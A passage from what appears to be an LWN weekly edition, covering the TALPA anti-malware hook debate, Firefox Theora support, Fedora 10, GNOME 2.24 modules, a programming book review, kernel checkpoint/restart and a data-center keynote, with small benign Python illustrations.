employee.  The resulting discussion has certainly not been what the
TALPA developers would have hoped for; it is, instead, a good example of
how a potentially useful idea can be set back by poor execution and
presentation to the kernel community.


The idea behind TALPA is simple: various companies in the virus-scanning
business would like a hook into the kernel which allows them to check for
malware and prevent its spread.  So the patch adds a hook into the VFS code
which intercepts every file open operation.  A series of filters can be
attached to this intercept, with the most important one being a mechanism
which makes the file being opened available to a user-space process as a
read-only file descriptor.  That process can scan the file and tell the
kernel whether the open operation should be allowed to proceed or not.  In
this way, the scanning process can prevent any sort of access to files
which are deemed to contain bits with evil intentions.


There are a few other details, of course.  A caching mechanism prevents
rescanning of unchanged files, increasing performance considerably.  There
is also a hook on close() calls which can trigger the rescanning
of a file.  Processes can exempt themselves from scanning if it might get
in their way; scanning can also be turned off for specific files, such as
those used for
relational database storage.  But the patch set is relatively small, as it
really does not have that much to do.
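
The open-time interception and caching described above can be modeled roughly
as follows.  This Python sketch is not the TALPA API: the class, the callback
signature, and the use of a version counter as the cache key are all
assumptions made for illustration.

```python
# Toy model of scan-on-open with a result cache and exemptions.
class OpenInterceptor:
    def __init__(self, scanner):
        self.scanner = scanner      # callable: file contents -> True if clean
        self.cache = {}             # path -> (version, verdict)
        self.exempt_paths = set()   # files that are never scanned
        self.scans = 0

    def allow_open(self, path, contents, version):
        """Decide whether an open of `path` may proceed."""
        if path in self.exempt_paths:
            return True
        cached = self.cache.get(path)
        if cached and cached[0] == version:
            return cached[1]        # unchanged file: reuse the old verdict
        self.scans += 1
        verdict = self.scanner(contents)
        self.cache[path] = (version, verdict)
        return verdict

hook = OpenInterceptor(lambda data: b"EVIL" not in data)
print(hook.allow_open("/tmp/a", b"hello", 1))   # True, scanned
print(hook.allow_open("/tmp/a", b"hello", 1))   # True, served from cache
print(hook.allow_open("/tmp/a", b"EVIL", 2))    # False, rescanned after change
print(hook.scans)                               # 2
```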


This capability could well prove to be useful.  Even if one is not
concerned about malware infections on Linux systems, a lot of files
destined for more vulnerable platforms can pass through Linux servers.
There is also the potential for the detection of attempted exploits of the
Linux host.  Normally, in the Linux world, the way we respond to knowledge
of a specific vulnerability is to patch the problem rather than scan for
exploits, but there may be systems which cannot be restarted on short
notice, and which could benefit from an updated scanning database while
running code with known vulnerabilities.  Also, as Alan Cox pointed out, this feature could be
useful for entirely different objectives, such as efficient indexing of
files as they change.


What might be best of all, though, is that this hook could replace a number
of rather less pleasant things being done by anti-malware vendors now.
Some of these products use binary-only modules, plant hooks into the system
call table, and generally behave in unwelcome ways.  Moving all of that to
a user-space process behind a well-defined API could be beneficial for
everybody involved.


The patches have gotten a generally hostile reception on the kernel mailing
lists, though.  Some developers are
uninspired about the ultimate objective:


	So you are going to try to force us to take something into the
	Linux kernel due to the security inadequacies of a totally
	different operating system?  You might want to rethink that
	argument.


That's an objection which can be worked around; the kernel developers do
not normally want to determine which applications will or will not be supported by
the system as a whole.  

Another objection, though, might be harder: this hook is said not to be the
best solution to the problem.  Instead of putting a hook deep within the
VFS layer, the anti-malware people could simply hook into the C library
(perhaps with LD_PRELOAD), put the malware scanning directly into
the processes (mail clients or web servers, say) which are passing files
through the system, or embed the scanning into a stackable filesystem
implemented with FUSE (or a similar mechanism).  That has led to
counterarguments that scanning implemented in this manner could be evaded
by a hostile application - by performing system calls directly, for
example, instead of going through the C library.  Certain kinds of attacks,
it is said, could get around a purely user-space solution.

That argument, however, highlights the real problem with this posting.  The
patch includes a set of 13 "requirements," including intercepting file
opens, caching results, exempting processes, and so on.  But none of these
requirements describes the problem which is really being solved.  In
particular, as noted by Al Viro and others,
there is no description of the threat which this patch is intended to
mitigate:


	Various people had been asking for _years_ to define what the hell
	are you trying to prevent.  Not only there'd been no coherent
	answer (and no, this list of requirements is _not_ that - it's
	"what kind of hooks do we want"), you guys seem to be unable to
	decide whether you expect the malware in question to be passive or
	to be actively evading detection with infected processes running on
	the host that does scanning.


If the scanning host could be infected, then a scanning mechanism which
could be circumvented by a rogue program is indeed a problem.  But that is
a very different threat than simply trying to prevent evil attachments from
creating mayhem on Windows boxes; it does not appear to be a threat which
these patches are trying to address.


The lack of a clearly described problem has caused the discussion of these
patches to go around in circles; it is not possible to evaluate
(1) whether the goals of these patches are worth supporting, or
(2) whether the patches can actually be successful in achieving those
goals.  The code, in other words, cannot be reviewed.  Until the TALPA
developers can clarify that situation, their work will look like an example
of "shoot first, then aim."  That kind of code tends not to make it
into the mainline, even if it could be useful in the end.

		Firefox to support Theora video


Video in the browser, at least for Linux, has always resorted to somewhat
clunky solutions—Flash plug-ins or external programs—but that is
likely to change in Firefox 3.1.  Recent commits to the
Firefox development 
tree
have added support for the HTML 5 <video> and <audio> tags as
well as native Ogg Vorbis and Theora support.  Providing multimedia 
support directly in a free browser, with no plug-in required, is a huge step
forward both for Linux and for the royalty-free codecs. 


The battle over video and audio formats is an ugly one, largely because
they are patent minefields.  The "mainstream" formats, MPEG-4 for video and
MP3 for audio, are licensed on a royalty basis to companies that want to
implement playback.  Obviously, Mozilla is not in a position to pay a
per-installation royalty, so that leaves various ad hoc methods using
JavaScript and plug-ins (which users have to track down) to make audio-video
playback work in its browser.


Trying the new feature (seen at left) on one of the recent nightly Firefox
builds seemed 
to work pretty well given that it is still under development.  The video played
smoothly, but the audio was not functional, only producing a rumbling,
clicking soundtrack.  The Wikimedia
Commons video collection was used to test as it is a nice collection of
Theora videos.


Some have seen the lack of Theora content currently on the web as a reason
to downplay
Firefox's support for the format, which is unfortunate, as Mozilla
hacker Robert O'Callahan was quick to point
out.  Unlike the
current situation, once a Firefox with video support is released, there
will be one format that all content producers can be sure will be available
for Firefox.  Depending on whose numbers you believe, that means that somewhere
between 10 and 25% of web surfers (or more than 100 million people) will be
using it.   


Even with the dominance of Internet Explorer, the plethora of codec
plug-ins has made it somewhat difficult for content providers to decide
upon which video formats to support.  With a substantial fraction of browsers
supporting a particular free format, that situation may change.  Wikimedia
will certainly help by providing reasons for those not using
Firefox to demand Theora plug-ins—if not integrated Theora
support—for their browsers.  As more content is available in that
format, the pressure will build on Microsoft and Apple.  As we mentioned in an
article on web video formats
last December, 
more content is the key to Theora support.


Some have argued that Vorbis and Theora are just as likely to be
patent-encumbered as the more mainstream codecs, but so far that is
unproven.  There is no licensing authority that claims to have patents
covering those codecs.  Though Mozilla has some depth to its
pockets—largely due to its deal with Google—patent holders
might be loath to attack a free software browser.  In many ways, patent
holders risk upsetting their entire apple cart if their attacks rise too high
into the public consciousness.  Though, clearly, Mozilla will be taking on
some amount of risk with this move.


There have also been arguments that the Theora codec produces
inferior video compared to those used by MPEG-4 and others.  There is
certainly truth to 
that assertion, but there is ongoing work to bring Theora more in line with
the quality of its competitors.  Due to the fact that it isn't controlled
by a licensing authority with little or no interest in improving it, there is
hope that Theora, or some descendant of it, could produce superior results
some day.


Dirac—also known by the name of
its C language implementation Schrödinger—is another royalty-free codec
that is being looked at for inclusion into Firefox.  There are currently
some performance issues with decoding, but if those get resolved, there
might be two free choices for video codecs in Firefox.


There are lots of entrenched interests that would like to see Theora,
Vorbis, Dirac, and others like them disappear.  They are quite happy with
the current state of affairs.  For the most part, though, users are not.
Even on "well supported" platforms, video—and to a lesser extent
audio—is a confusing jumble of plug-ins and formats that make it
somewhat painful to use.  Flash and Silverlight are supposed to "solve"
these problems, but they do it in a not-quite-free way that still requires
plug-ins.  If web users start
to find it easier to use the video formats embedded in their browser, and
content producers take notice, it
could completely change video on the web.


		Looking forward to Fedora 10


The Fedora 10 alpha release
is now available.  At this point, the next Fedora release (due at the end
of October) should be mostly feature-complete, though the project reserves
the right to continue development work through the beta release (currently
planned for August 19).  So this seems like a good opportunity to have
a look at some of the features which can be expected in Fedora 10.

Rawhide users, who are well known for their masochistic tendencies, are
already running the 2.6.27-rc kernels.  Given that 2.6.27 should come out
in the early part of October, chances are good that this is the kernel
version which will come standard with Fedora 10.  So Fedora users will
be among the first to get enhanced webcam support, UBIFS, ftrace,
multiqueue networking, and more.

Improved webcam support is an explicit goal for Fedora 10 in general.  The
kernel upgrade will help a lot in that regard, but Fedora is taking aim at
another longstanding problem: quite a few video applications still use the
Video4Linux1 API, despite the fact that said API has been deprecated for
years.  To help improve this situation, Hans de Goede has been working on
another long-missing piece: a
user-space library to make the Video4Linux2
API easier for applications to use.  It will handle things like format
conversions, which, by policy, are not allowed in the kernel; it also does
better impedance matching between the V4L1 and V4L2 interfaces.  The end
result of this work will be better-working webcams for Fedora users - and
for everybody else.

A similar objective for Fedora 10 is better support for remote controls.
The LIRC remote control package has
always been a some-assembly-required affair; Fedora developers are trying
to improve this situation and get remote controls to just work.

"Just works," alas, is not a phrase which has been heard often enough
around the PulseAudio sound server.  The upcoming Fedora release will have
a seriously rewritten PulseAudio; the biggest change is a shift to
timer-based audio scheduling instead of the older interrupt-driven
technique.  The promised result will be glitch-free audio; those who are
curious about the details of how this will work can find them on this
page.  PulseAudio is getting better.

Another big change, of course, is the shift to RPM 4.6 - the first real
update to the RPM package manager in many years.  Being fully aware of the
consequences of 
a failed RPM upgrade, the Fedora developers are proceeding with great
caution.  The on-disk format will not be changed anytime soon, and newer
RPM features are not, yet, being used in Fedora; that means that they can
revert to the older RPM if need be without leaving systems stranded.
After some early glitches, RPM 4.6 would appear to be working fairly well,
though, so this upgrade will probably stick.

Beyond that, Fedora users can expect a long list of new goodies.
NetworkManager now has a feature allowing the sharing of network
connections via wireless.  There are plans to provide much-improved support
of the Haskell programming language, though that project appears to be
moving slowly.  And there is an interesting new security audit tool intended to
look for security problems and signs of intrusions.  Your editor would have
loved to try out this tool, but, as of this writing, the version in Rawhide
appears to be lacking some fundamental features - like being able to start
up successfully.  Stay tuned.

One thing that apparently will not be in Fedora 10, despite the occasional
user request, is KDE 3.5.  Some KDE
users are not, yet, happy with the state of development of KDE 4 and
would like to have their old, familiar desktop back.  This note from Fedora leader Paul Frields
explains why KDE 3.5 will not be returning to Fedora.  In summary:
Fedora exists to push the leading edge, Qt 3 is no longer maintained, and
shipping KDE 4 helps that platform improve more quickly.  So
KDE 3.5 will not be coming back - unless somebody else goes to the
trouble of packaging and maintaining it.


All told, there is a lot of work going into this distribution release.  The
best way to really see what's going on - and to help the process - is, of
course, to try out the alpha release and report any problems which
result.  After making good backups, of course.

		The GNOME 2.24 module proposals


The GNOME desktop environment
is built in a modular manner with API-stable
platform modules and less API-stable
desktop modules.
Desktop modules can be transitioned to platform modules as they mature.
The Damned Lies about GNOME
translation site describes the GNOME modules:
"Modules are separate libraries or applications, with one or more branches of development included. They are usually taken from CVS, and we keep all relevant information on them (Bugzilla details, web page, maintainer information,...)."  The site contains an extensive
list of modules
for the current GNOME 2.22 release.


On August 4, 2008, the
list of modules to be included 
in the upcoming GNOME 2.24 release was posted.
A quick tour of the new modules to be included follows:


empathy:
"Empathy consists of a rich set of reusable instant messaging widgets, and a GNOME client using those widgets. It uses Telepathy and Nokia's Mission Control, and reuses Gossip's UI. The main goal is to permit desktop integration by providing libempathy and libempathy-gtk libraries. libempathy-gtk is a set of powerful widgets that can be embeded into any GNOME application."


 project hamster:
"Project Hamster is time tracking for masses. It helps you to keep track [of] how much time you have spent during the day on activities you have set up.
Whenever you change from doing one task to other, you change your current activity in Hamster. After a while you can see some statistics of how many hours you have spent on what. Maybe print it out, or export to some suitable format, if time reporting is a request of your employee."


 clutter:
"Clutter is an open source software library for creating fast, visually rich and animated graphical user interfaces.
Clutter uses OpenGL (and optionally OpenGL ES for use on Mobile and embedded platforms) for rendering but with an API which hides the underlying GL complexity from the developer."


 libcanberra, announced here, is a lightweight sound event library that
implements the XDG sound theming/naming specs. 


 PolicyKit
(from an LWN article):
"Mounting removable filesystems, CDs, USB devices, and the like, is a
classic example of a root-only task that some non-privileged users might be
allowed to perform. In the past, various mechanisms using groups or mount
options in /etc/fstab have been used with some success, but the mechanisms
were specific to mounting and did not provide the flexibility that some
administrators would like. Network configuration - particularly for
wireless networking - is another common task that users might be allowed to
do.
PolicyKit is an attempt to centralize these kinds of decisions into a
single policy file that the administrator can use to set the kinds of
access regular users should be allowed." 


There are also a few modules which were not accepted this time around:


 Conduit:
"Conduit is a synchronization application for GNOME. It allows you to synchronize your files, photos, emails, contacts, notes, calendar data and any other type of personal information and synchronize that data with another computer, an online service, or even another electronic device.
Conduit manages the synchronization and conversion of data into other formats."
Conduit was partially rejected due to an incomplete UI, but allowed as an
external dependency for use by other applications.
It should be ready for inclusion in GNOME 2.26.


 WebKit:
"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and JavaScript code began as a branch of the KHTML and KJS libraries from KDE."
The plan is to replace the
Gecko
HTML rendering engine with WebKit in time for GNOME 2.26.


 libgda (part of Gnome-DB):
"Libgda is a database abstraction layer which hides all the database backend specifics from the user, offering a simple interface to each supported database (MySQL, PostgreSQL and SQLite are fully functional while Oracle and MDB are useable and missing features) to run queries."
Libgda is required by the
Anjuta IDE; it will either
be included optionally or bundled with Anjuta.


There is, of course, a lot more to GNOME 2.24 than a few new modules; see
the roadmap for more
information.  This GNOME release is currently scheduled for
September 24.

		Kernel Hacker's Bookshelf: The Practice of Programming


In
The
Mythical Man-Month, Fred Brooks observes that the productivity of
experienced programmers frequently varies by a factor of 10 or more.
What makes the 10x programmers so much better?  Undoubtedly some of
the difference is due to native facility with language or logic.  But
even with these advantages, no one is born writing beautiful, elegant,
maintainable code; everyone goes through a learning process.


How do we learn to be good programmers?  In many ways, the art of
computer programming is still stuck in the era of the
master-apprentice system.  Some of us are lucky enough to learn to
program in something like
"the
UNIX room" at Bell Labs, where you could shoulder-surf the likes
of Ken Thompson and Dennis Ritchie.  Occasionally someone practices
pair-programming instead of just arguing passionately about it, and
once in a very long while, a 10x programmer will actually teach
another person how to program.  Unfortunately, formal university
education rarely teaches students about the practical aspects of
programming, as any holder of a computer science degree will readily
attest, and few programmers have the time, interest, or ability to
write accessible books about programming.  As a result, most
programmers are doomed to a decade of re-inventing wheels by trial and
error.


Brian Kernighan and Rob Pike are two 10x programmers who do have the
time, interest, and ability to write a book about software engineering
best practices.
The
Practice of Programming aims to fill the gaps in the training of
most computer programmers.  From the book: 


Topics like
testing, debugging, portability, performance, design alternatives, and
style - the practice of programming - are not usually the focus of
computer science or programming courses.  Most programmers learn them
haphazardly as their experience grows, and a few never learn them at
all.


  This book probably won't make you ten times more productive,
but it can easily make you twice as productive (and half as
frustrated).  If I could send one book to a programmer trapped on a
desert island, this would be the book - and I'd send the same book to
the new programmer who just joined my development team.

Overview

The Practice of Programming differs from most programming books in
several enjoyable ways.  Rather than promoting a particular new
programming philosophy, Kernighan and Pike focus on three principles:
simplicity, clarity, and generality.  As you might guess from the
title, the book is short on theory and long on practice.  About one
third of the ~250 page book is taken up by actual real-world example
code, starting with the original dodgy code and showing the
step-by-step evolution to better code.  Most examples are in C, but
the principles illustrated readily translate to other languages.


The writing style of this book is refreshingly practical and
down-to-earth, without losing generality.  The authors avoid stark
black-and-white pronouncements, preferring to discuss why different
techniques are useful under different conditions.  Clarity is another
hallmark of their style; they use as few words as possible to clearly
state each point, and dismiss trivialities and side issues quickly and
cleanly.  A typical example of this approach is their advice on brace
and indentation style: "The specific style is less important than its
consistent application.  Pick one style, preferably ours, use it
consistently, and don't waste time arguing."


The book is organized into nine chapters, each covering a topic such
as testing or debugging that usually requires an entire book on its
own.  The table of contents includes headings like "Test as You Write
the Code," "Consistency and Idioms," "Strategies for Speed," "Other
People's Bugs," and "Programs that Write Programs."  I can't cover the
whole book in this review, but I'll go into detail on two of my
favorite chapters, "Performance" and "Notation."

Performance

The introduction of this chapter gives some very direct advice: "The
first principle of optimization is don't."  Computers
are fast - go run
lmbench on your desktop
to update your sense of just how fast.  For example, some system calls
are now in the sub-microsecond range under Linux on modern hardware.
Armchair optimization - the practice of making small theoretical
optimizations as you code, at the expense of readability, portability,
or correctness - is especially foolish in light of Donald Knuth's
observation that 4% of the code typically accounts for more than half
of the run-time of the program.  Kernighan and Pike's first piece of
advice is to write simple, clear, concise code, and optimize only when
you have some tangible reason to do so.


The chapter begins with a real-world optimization problem: a
spam-filter that worked well enough in testing but bogged down in
production.  The tangible reason for optimizing this program is that
the mail queues were filling up with undelivered mail - a clear
justification for optimization if there ever was one.  The authors
show the process they went through to optimize the spam-filter,
step-by-step: profiling, analysis, a first attempt at optimization,
re-factoring the problem, addition of pre-computation, and measurement
of the results.  This overview is welcome not only as a good
programming war story but also because the overall flow of code
optimization is non-obvious (otherwise, "How would you go about
optimizing a program?" would not be such a common interview question).


The rest of the chapter talks about best practices for each step of
optimization.  The first topic is timing and profiling, as it should
be.  All too often, even good programmers measure performance by
"feel" - if you don't believe me, search LKML.  Sometimes no easy tool
exists to measure what is being optimized, but it's still better to
write some kind of measurement tool, no matter how clunky or
approximate.  Human perception and judgment are heavily influenced by
preconceptions and the vast majority of theoretical optimizations have
negligible effects on performance.  A more subtle piece of advice is
to turn performance results into pictures or graphs.  Chris
Mason's seekwatcher
is an excellent example; it turns block traces into graphs - and even
movies!


The authors cram a surprisingly complete demonstration of profiling
into less than two pages, using prof on their spam-filter as
the example.  They show how to identify hot spots and do basic sanity
checking on the results - e.g., match up the number of times a
function call shows up in the profile with the number of iterations of
the main loop.  While they include some caveats on trusting profiling
results, I wish they had spent some time on the design of profiling
tools to show the kinds of biases and errors that so often make
profiling results misleading.  Perhaps it's because I work on systems
software, but I've found that I really have to know the details:
whether the profiler uses a periodic timer or hardware counters,
whether it includes time spent sleeping for I/O in the kernel, how many
events are dropped or missed, etc.  A useful technique to demonstrate, and one in
keeping with their minimalist, do-it-yourself philosophy, would be
manually bisecting the code with timers to find hot spots when normal
profiling tools fail.
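
The book does not show this technique, so what follows is only a minimal sketch of what manual bisection with timers could look like.  The two stages, parse() and score(), are hypothetical stand-ins for the halves of a slow program; wrap each half in a timer, see which one dominates, then move the timers inward and repeat.

```python
import time
from collections import defaultdict
from contextlib import contextmanager

# Accumulated wall-clock seconds and entry counts per labeled region.
totals = defaultdict(float)
counts = defaultdict(int)

@contextmanager
def timed(label):
    """Charge the wall-clock time of the enclosed block to `label`."""
    start = time.perf_counter()
    try:
        yield
    finally:
        totals[label] += time.perf_counter() - start
        counts[label] += 1

def parse(lines):
    # Hypothetical stage 1: split each line into words.
    return [line.split() for line in lines]

def score(records):
    # Hypothetical stage 2: deliberately quadratic work.
    return sum(len(a) * len(b) for a in records for b in records)

def run(lines):
    """Run both stages, timing each one separately."""
    with timed("parse"):
        records = parse(lines)
    with timed("score"):
        result = score(records)
    return result

def report():
    """Return (label, seconds, entries) tuples, most expensive first."""
    rows = [(label, totals[label], counts[label]) for label in totals]
    return sorted(rows, key=lambda row: row[1], reverse=True)
```

The entry counts support the sanity check described above: if a region is entered a different number of times than the main loop iterates, the measurement (or the program) deserves a second look.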


The discussion on rewriting code goes beyond "find the top function
and optimize it" - it also addresses eliminating calls to hot
functions entirely and doing modest amounts of pre-computation.  A
fair portion of the section on code tuning has been superseded by
improved compilers which can do, e.g., loop-unrolling automatically,
but it still teaches valuable lessons about how to read code and
understand its true cost and complexity.

Notation

The chapter on notation unfolds elegant, beautiful solutions one by
one, turning normally painful problems into fun coding exercises.
Each technique - little languages, special-purpose notation,
programs that write programs, virtual machines - is accompanied by a
concrete demonstration of how to implement the bare minimum of the
technique to get the job done.  The suggestion to "write a new
language" seems absurd in the face of most day-to-day programming
problems, but writing a very small, very specialized language can save
the programmer much time and many bugs, even when replacing only a few
hundred lines of conventional code.  Their first example,
after printf() format specifiers, is a notation for packing
and unpacking network packets.  I recently implemented this technique
and can report that it worked beautifully, repaying the time I
invested in it within days of completion.
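
To give a flavor of how small such a notation can be, here is a sketch of a packing language in Python rather than the book's C.  The format letters (c, s, and l for one-, two-, and four-byte unsigned integers) and the big-endian byte order are assumptions made for illustration, not a transcription of the authors' code.

```python
# Width in bytes of each format letter (an assumed, illustrative alphabet).
WIDTHS = {"c": 1, "s": 2, "l": 4}

def pack(fmt, *values):
    """Pack unsigned integers into bytes, one per format letter, big-endian."""
    if len(fmt) != len(values):
        raise ValueError("format and value count differ")
    out = bytearray()
    for letter, value in zip(fmt, values):
        # to_bytes() raises OverflowError if the value does not fit.
        out += value.to_bytes(WIDTHS[letter], "big")
    return bytes(out)

def unpack(fmt, data):
    """Inverse of pack(): return the integers described by fmt."""
    values = []
    pos = 0
    for letter in fmt:
        width = WIDTHS[letter]
        if pos + width > len(data):
            raise ValueError("packet too short for format")
        values.append(int.from_bytes(data[pos:pos + width], "big"))
        pos += width
    return values
```

With this in place, each packet type is described by a one-line format string such as "cscl" instead of a hand-written sequence of shifts and masks, which is where the savings in bugs comes from.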


Another exercise in minimalism is their demonstration of how to write
a basic grep in around 100 lines of C, without relying on
external libraries.  Most of us will never need to re-implement
regular expressions from scratch, but we may encounter a problem best
solved by writing a small general purpose pattern matcher.


Another example demonstrates the power (and danger) of keeping a
variety of scripting languages and data processing tools at your
fingertips.  The authors implement a crude text-only web browser with
about 50 lines of Awk, Tcl, and Perl, again using only built-in
language support and no external libraries or modules.  Here as
elsewhere, Kernighan and Pike refuse to make hard and fast assertions
about the One True Scripting Language; they'd rather you used the
right language for the right job.  From the book: 


These languages
together are more powerful than any one of them in isolation.  It's
worth breaking the job into pieces if it enables you to profit from
the right notation.


It can be argued that this approach is less
justified now, given the modern plethora of scripting languages
written specifically to address the limitations of earlier scripting
languages.  However, their argument still rings true for me, as
someone who has never settled down into one scripting language.  I
have a decade of experience using a hodge-podge of random scripting
languages, and when I do write in one scripting language, I end up
spending a lot of time contorting language features to fit situations
they were not designed for.


The section on virtual machines shows how to implement a minimal
special purpose virtual machine
(the Z-machine
for Zork comes to mind
immediately).  The remaining sections cover programs that write
programs, using macros to generate code (a common technique in Linux
header files), and just a little taste of run-time code generation.
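
A special-purpose virtual machine need not be large.  The sketch below is a toy stack machine in Python; the opcode names and the (opcode, operand) encoding are invented here for illustration and are not taken from the book.

```python
def run_vm(program):
    """Execute a list of (opcode, operand) pairs on a small stack machine.

    Returns the stack as it stands when the program halts or runs out
    of instructions.
    """
    stack = []
    pc = 0  # index of the next instruction
    while pc < len(program):
        op, arg = program[pc]
        pc += 1
        if op == "push":
            stack.append(arg)
        elif op in ("add", "sub", "mul"):
            right = stack.pop()
            left = stack.pop()
            if op == "add":
                stack.append(left + right)
            elif op == "sub":
                stack.append(left - right)
            else:
                stack.append(left * right)
        elif op == "halt":
            break
        else:
            raise ValueError("unknown opcode: %r" % (op,))
    return stack

# (2 + 3) * 4, expressed as a program for the machine above.
EXAMPLE = [
    ("push", 2),
    ("push", 3),
    ("add", None),
    ("push", 4),
    ("mul", None),
    ("halt", None),
]
```

The interpreter loop is the whole machine; adding an instruction means adding one branch, which is what makes the approach attractive for small, specialized jobs.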

Summary

The
Practice of Programming embodies its own principles: simplicity,
clarity, generality.  First published in 1999, it has aged well due to
its focus on general principles of good programming rather than
language-specific tricks and tips.  The book has something to offer to
programmers at all levels of experience; beginners will benefit most
but experienced developers will appreciate the more advanced and
subtle techniques in the later chapters.  Of all the books on the
Kernel Hacker's Bookshelf, this one should never be missing.


		Kernel-based checkpoint and restart


Your editor, who has carefully hidden several years of experience in 
Fortran-based scientific programming from this readership, encountered
checkpoint and restart facilities a long time ago.  In those days, programs
which would run for days of hard-won CPU time on an unimaginably fast CDC
or Cray mainframe would occasionally checkpoint themselves, minimizing the
amount of compute time lost when (not if) the system went down at an
inopportune time.  It was a sort of insurance policy, with the premiums
being paid in the form of regular checkpoint calls.

Central processor time is no longer in such short supply, but there is
still interest in the ability to checkpoint a running application and
restore its state at some future time.  One obvious application of this
capability is to restore the application on a different machine; in this
way, running applications can be moved from one host to another.  If the
"application" is an entire container full of tasks, you now have the
ability to shift those containers around without the contained tasks even
being aware of what is going on.  That, in turn, can provide for load
balancing, or just the ability to move containers off a machine which is
being taken down.


Linux does not have this capability now.  Anybody who thinks about adding
it must certainly find the prospect daunting; applications have a
lot of state hidden throughout the system.  This state includes open
files (and positions within the files), network sockets and pipes connected
to remote peers, signal states, outstanding timers, special-purpose file
descriptors (for epoll_wait(), for example), ptrace()
status, CPU affinities, SYSV semaphores, futexes, SELinux state, and much
more.  Any 
failure to save and properly restore all of that state will result in a
broken process.  It is no wonder that Linux does not do checkpoint and
restart; most rational developers would be driven away by the complexities
involved in making it work in an even remotely robust manner.


But, then, there was a time when rational programmers would not have
attempted the creation of Linux in the first place.  So it should not be
surprising to see that developers are working on the checkpoint and restart
problem.  The latest attempt can be seen in this patch set posted by Dave
Hansen (but originally written by Oren Laadan).  It is far from being ready
for prime-time use, but it does show the sort of approach which is being
taken.


For some time, the prevailing wisdom was that checkpoint and restart should
be pushed as much into user space as possible.  A user-space process could
handle the marshaling of process state and writing it to a file; the
kernel would only get involved when it was strictly necessary.  It turns
out, though, that this involvement is needed fairly often, requiring the
addition of "lots of new, little kernel interfaces" to make everything
work.  So, at a meeting at OLS, the checkpoint/restart developers decided
to take a different approach and move the work into the kernel.  The result
is the creation of just two new system calls:

    int checkpoint(pid_t pid, int fd, unsigned long flags);
    int restart(int crid, int fd, unsigned long flags);


A call to checkpoint() will write an image of the current process
to the given fd.  The pid argument identifies the init
process for the current process's container; it is saved to the image but
not otherwise used in the current patch.  If the operation succeeds, the
return value will be a unique (until the system reboots) "checkpoint image
identifier".  
restart() reverses the process; crid is the image
identifier, which is not currently used.  The flags argument is
currently unused in both system calls.
These interfaces seem likely to change; future enhancements to the
interface are likely to include capabilities like checkpointing other
processes and groups of processes.
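
The proposed system calls cannot be tried without the patch set, but the basic shape (write an image to a file descriptor, read it back later) can be illustrated with a purely user-space analogy.  The sketch below is not the kernel interface: it saves only a Python dictionary, the function names merely echo the system calls, and the toy computation in advance() is hypothetical.

```python
import os
import pickle

def checkpoint(state, fd):
    """Write an image of `state` to the open file descriptor `fd`."""
    # Work on a duplicate so that the caller's descriptor stays open.
    with os.fdopen(os.dup(fd), "wb") as image:
        pickle.dump(state, image)

def restart(fd):
    """Read back the image stored at the current offset of `fd`."""
    with os.fdopen(os.dup(fd), "rb") as image:
        return pickle.load(image)

def advance(state, steps):
    """Toy computation: add the next `steps` integers to a running total."""
    for _ in range(steps):
        state["total"] += state["next"]
        state["next"] += 1
    return state
```

A caller would run advance() for a while, call checkpoint(), and, after a crash, seek the descriptor back to the start of the image and call restart() to pick up where the computation left off.  Note that pickle will happily execute code embedded in a malicious image, so this sketch shares, in miniature, the concern about restarting from a carefully-manipulated checkpoint.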


The CAP_SYS_ADMIN capability is currently required for both
checkpoint() and restart().  That is somewhat
unfortunate, in that it would be nice if ordinary, unprivileged processes
were able to checkpoint and restart themselves.  There are some real
security implications which must be kept in mind, though, especially when
one considers the sort of damage that could result from an attempt to
restart a carefully-manipulated checkpoint image.  Making
restart() secure for unprivileged use will not be a job for the
faint of heart.


At this stage of development, the patch does not even attempt to solve the
entire problem.  It is able to save the current state of virtual memory
(but only in the absence of non-private, shared mappings), current
processor state, and the contents of the task structure.  That is enough to
checkpoint and restart a "hello, world" program, but not a whole lot more.
But that is a reasonable place to start.  Given the complexity of the
problem, proceeding in careful baby steps seems like the right way to go.
So we're probably not going to have a working checkpoint facility in the
kernel in the near future, but, with luck and patience, we'll eventually
have something that works.

		Moving the Data Center, a LinuxWorld Keynote from Kevin Clark


Last week your author was in San Francisco attending LinuxWorld 2008.  One
keynote was from Kevin Clark, Director of IT Operations at Lucasfilm.
Lucasfilm is the production company that brought us Star Wars, Indiana
Jones and many other movies and related merchandise.  As the Director of
IT Operations, Kevin is responsible for the IT needs of four separate
divisions in five locations.  In 2005 the main data center was moved to
a new facility; Kevin talked about the challenges and lessons learned in
the process of moving a high availability data center, while making three
movies and maintaining high security.

The four divisions of Lucasfilm all have different needs; to meet those
needs, the data center has machines running Linux, Unix, Windows and a few
Macs.  Industrial Light and Magic (ILM) is the biggest user of Linux.  This
is the division that does the special effects for Lucasfilm and many other
movies such as Disney's "Pirates of the Caribbean" series.  Lucas Arts,
Lucas Licensing and Lucas Animation are the other three.  These three
divisions handle the production of movie-based video games, action figures,
official web sites, animated films and other related endeavors.

When Hollywood producers want special effects, they want something that
hasn't been seen before, something amazing.  With each new movie the
producer strives to out-do other movies.  ILM must be on the bleeding edge
of special effects technology, while maintaining high availability and high
security.  ILM Linux clusters run around the clock, producing "some of the
best special effects the industry has to offer."  Downtime is not an
option, even for a major move.

Kevin's talk was about moving the data center, and not particularly about
Linux.  He did have some nice, short films showing off some of ILM's work.
Did you know that Pirates of the Caribbean was not filmed on a ship at
sea?  It's just rendered that way.

For the new data center, Kevin knew he wanted to consolidate systems such
as email, databases, storage and backup/recovery.  He knew he needed
flexible power and cooling, a flexible distribution design, lots of
storage for the rendering clusters and the backups, and
web hosting for movie sites and other related businesses.  The center has
high bandwidth requirements, both internally and externally.  Also, there
are always many people trying to get the scoop on the latest movies and
games, so high security is paramount.  He chose technologies from AMD,
Foundry, NetApp, HP and Juniper to accomplish his goals.

The new data center has over 700 miles of fiber and over 2000 miles of
copper with a global WAN for sites at the Telco depot, Letterman Digital
Arts Center, Skywalker Ranch, Big Rock Ranch and Singapore Animation.
There are 400 terabytes of storage.  The AMD blades have 32 gigabytes of
memory and are stacked 66 blades per rack.  There are lots of racks, and
floor-to-ceiling airflow cools them.  During filming, all shots are archived,
so there is high volume at all times and complete disaster recovery is
required.

Kevin had a few lessons that he learned from the data center move: DC power
has limitations; equipment interoperability is key; and the center should be
built to scale, following a network design.  The center has needs outside of IT to
consider.  All the pieces must be fully redundant.  You always think that
it is fully redundant until it fails.  Power and cooling requirements must
be balanced.  Run the computers hotter to save power, but not so hot that
they fail.  The data center is a continually moving target with constant
pressure to be more energy efficient.  More virtualization could
help. Getting light to move faster would help.

